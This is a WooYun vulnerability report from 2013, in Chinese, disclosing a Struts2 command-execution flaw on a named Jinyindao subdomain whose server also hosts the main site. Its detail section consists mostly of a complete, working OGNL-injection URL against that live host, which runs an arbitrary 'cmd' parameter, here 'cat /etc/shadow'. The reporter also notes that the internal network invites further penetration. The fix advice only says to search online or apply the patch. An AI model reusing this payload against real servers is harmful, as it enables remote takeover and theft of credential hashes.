当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023793

漏洞标题:金银网某分站存在命令执行漏洞,危机同服的主站及多个分站

相关厂商:金银岛某分站

漏洞作者: 只钻空子

提交时间:2013-05-15 17:59

修复时间:2013-06-29 17:59

公开时间:2013-06-29 17:59

漏洞类型:命令执行

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金银网某分站存在命令执行漏洞,可shell,危及同服的主站及多个分站。

详细说明:

金银岛供应求购分站存在执行漏洞,可利用该漏洞在服务器上执行任意命令:

jyd.png


由于主站与该分站同服,所以将会一并沦陷...

tf.png


服务器内网的内容貌似也很丰富,渗透空间很大:

nw.png


代码执行示例:查看root密码等私密信息:

http://gy.315.com.cn/freem!index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43req\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\43webRootzpro\75@java.lang.Runtime@getRuntime().exec(\43req.getParameter(%22cmd%22))')(d))&(i)(('\43webRootzproreader\75new\40java.io.DataInputStream(\43webRootzpro.getInputStream())')(d))&(i01)(('\43webStr\75new\40byte[51020]')(d))&(i1)(('\43webRootzproreader.readFully(\43webStr)')(d))&(i111)(('\43webStr12\75new\40java.lang.String(\43webStr)')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\43xman\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\43xman.getWriter().println(\43webStr12)')(d))&(i99)(('\43xman.getWriter().close()')(d))&cmd=cat /etc/shadow


回显如下:

jyd.png

漏洞证明:

jyd.png


nw.png

修复方案:

百度一下就可以搞定的,或者官方下补丁。

版权声明:转载请注明来源 只钻空子@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论